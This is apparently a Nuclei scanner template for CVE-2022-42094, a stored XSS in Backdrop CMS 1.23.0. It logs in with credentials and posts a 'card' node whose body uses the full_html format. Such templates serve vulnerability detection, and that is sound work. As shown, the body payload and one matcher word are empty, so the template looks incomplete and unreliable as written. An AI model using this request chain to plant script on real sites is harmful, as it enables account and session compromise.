id: CVE-2022-42094 info: name: Backdrop CMS version 1.23.0 - Stored Cross Site Scripting author: theamanrawat severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content. reference: - https://github.com/backdrop/backdrop/releases/tag/1.23.0 - https://github.com/bypazs/CVE-2022-42094 - https://nvd.nist.gov/vuln/detail/CVE-2022-42094 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-42094 cwe-id: CWE-79 metadata: max-request: 4 verified: true tags: cve,cve2022,xss,cms,backdrop,authenticated http: - raw: - | GET /?q=user/login HTTP/1.1 Host: {{Hostname}} - | POST /?q=user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in - | GET /?q=node/add/card HTTP/1.1 Host: {{Hostname}} - | POST /?q=node/add/card HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="title" {{randstr}} ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="files[field_image_und_0]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="field_image[und][0][fid]" 0 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="field_image[und][0][display]" 1 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="changed" ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="form_build_id" {{form_id_2}} ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="form_token" {{form_token}} ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="form_id" card_node_form ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="body[und][0][value]" ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="body[und][0][format]" full_html ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="status" 1 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="name" {{name}} ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="date[date]" 2023-04-13 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="date[time]" 21:49:36 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="path[auto]" 1 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="comment" 1 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="additional_settings__active_tab" ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="op" Save ------WebKitFormBoundaryWEcZgRB4detkrGaY-- cookie-reuse: true host-redirects: true matchers-condition: and matchers: - type: word part: body words: - '' - 'Backdrop CMS' condition: and - type: status status: - 200 extractors: - type: regex name: form_id_1 group: 1 regex: - 'name="form_build_id" value="(.*)"' internal: true - type: regex name: name group: 1 regex: - 'name="name" value="(.*?)"' internal: true - type: regex name: form_id_2 group: 1 regex: - 'name="form_build_id" value="(.*)"' internal: true - type: regex name: form_token group: 1 regex: - 'name="form_token" value="(.*)"' internal: true